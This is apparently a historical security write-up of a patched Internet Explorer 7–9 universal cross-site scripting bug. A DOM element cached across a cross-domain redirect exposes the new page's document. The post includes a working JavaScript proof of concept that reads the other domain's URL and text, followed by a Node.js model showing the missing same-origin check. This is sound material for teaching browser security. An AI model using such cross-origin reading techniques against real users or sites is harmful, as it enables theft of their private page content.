Another variation on the cached-reference UXSS theme. This time the object that survives navigation is a plain DOM element created with createElement. After inserting the element into the window’s document and then letting the window redirect to a different domain, the cached element’s ownerDocument property points to the new domain’s document — with no origin checks applied.
<script language="JavaScript">
var win, pDiv;
function main()
{
// Open a same-origin page that will redirect itself to another domain.
win = window.open("redirect.aspx");
// Create an element in the popup's document and keep a reference to it in the opener.
pDiv = win.document.createElement("DIV");
win.document.appendChild(pDiv); // Very important to insert the element otherwise it won't work.
// Once the redirect has completed, the cached element's ownerDocument resolves to the new
// domain's document, and the alert runs in that window without any origin check.
setTimeout('pDiv.ownerDocument.parentWindow.alert(pDiv.ownerDocument.URL + "\\n\\n" +pDiv.ownerDocument.body.innerText);', 2000);
}
</script>
<input type="button" onclick="main()" value="Open Window and read its contents">
The element must actually be inserted into the document before the redirect — a detached element does not maintain the live ownerDocument reference in the same way. After two seconds the ownerDocument is pointing at the redirected page, and parentWindow.alert() fires in that context. This worked on Vista IE7 and Windows 7 IE8/IE9.
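To make the missing check concrete, here is an added example (not code from the original post, and not IE's code): a simplified Node.js model of a browsing context in which navigation reuses the same document object, so a cached element still reaches the live document through ownerDocument. It contrasts an unchecked read, which is what the PoC above exploits, with a read that compares the caller's origin against the target document's current origin on every access, which is what a correct implementation does. The origin rule (scheme, host, port tuple) is the real one; the BrowsingContext class and the sample URLs and page text are constructed for the model.

```javascript
// Added example (not from the original post or from IE): a simplified model of why the
// cached ownerDocument reference leaks, and of the same-origin check that a correct
// implementation applies on every access. Sample URLs and page text are constructed.

// Origin of a URL as its (scheme, host, port) tuple. The WHATWG URL parser drops default
// ports, so http://a.example:80/ and http://a.example/ compare equal, as they should.
function originOf(urlString) {
  const u = new URL(urlString);
  return `${u.protocol}//${u.host}`; // u.host keeps a non-default port
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

class SecurityError extends Error {
  constructor(message) { super(message); this.name = 'SecurityError'; }
}

// A minimal browsing context. Navigation here reuses the same document object and just
// rewrites its URL and body, which is the behaviour the write-up relies on: an element
// created before the redirect still reaches the live document through ownerDocument.
class BrowsingContext {
  constructor(url, bodyText) {
    this.document = { URL: url, body: { innerText: bodyText } };
  }
  navigate(url, bodyText) {
    this.document.URL = url;
    this.document.body.innerText = bodyText;
  }
  createElement(tagName) {
    return { tagName, ownerDocument: this.document };
  }
}

// What IE7-9 effectively did: follow the cached reference with no check at all.
function readDocumentUnchecked(el) {
  const doc = el.ownerDocument;
  return { url: doc.URL, text: doc.body.innerText };
}

// What a correct implementation does: compare the caller's origin with the origin the
// target document has *now*, on every access, and refuse when they differ.
function readDocumentChecked(el, callerUrl) {
  const doc = el.ownerDocument;
  if (!sameOrigin(callerUrl, doc.URL)) {
    throw new SecurityError(
      `Blocked cross-origin access from ${originOf(callerUrl)} to ${originOf(doc.URL)}`);
  }
  return { url: doc.URL, text: doc.body.innerText };
}

// Replays the write-up's sequence: open a same-origin popup, cache an element from it,
// let the popup redirect elsewhere, then read through the cached element both ways.
function runScenario() {
  const openerUrl = 'http://attacker.example/opener.html'; // constructed sample URL
  const win = new BrowsingContext('http://attacker.example/redirect.aspx', 'redirecting');
  const pDiv = win.createElement('DIV');

  const before = readDocumentChecked(pDiv, openerUrl); // same origin: allowed

  win.navigate('https://victim.example/inbox', 'constructed secret page text');

  const leaked = readDocumentUnchecked(pDiv); // the bug: the new domain's content
  let blocked = null;
  try {
    readDocumentChecked(pDiv, openerUrl);     // the fix: SecurityError is thrown
  } catch (e) {
    blocked = e.name;
  }
  return { before, leaked, blocked };
}

console.log(JSON.stringify(runScenario(), null, 2));
```

Run it with `node` and the output shows `leaked` carrying the victim page's URL and text while `blocked` is `SecurityError`. In a real browser the object model differs (after a cross-origin navigation the old document is left behind and is no longer the window's active document), but the principle is the same: every path from one origin's script to another origin's document must go through the same-origin check at access time, not only at the moment the reference was handed out.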
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.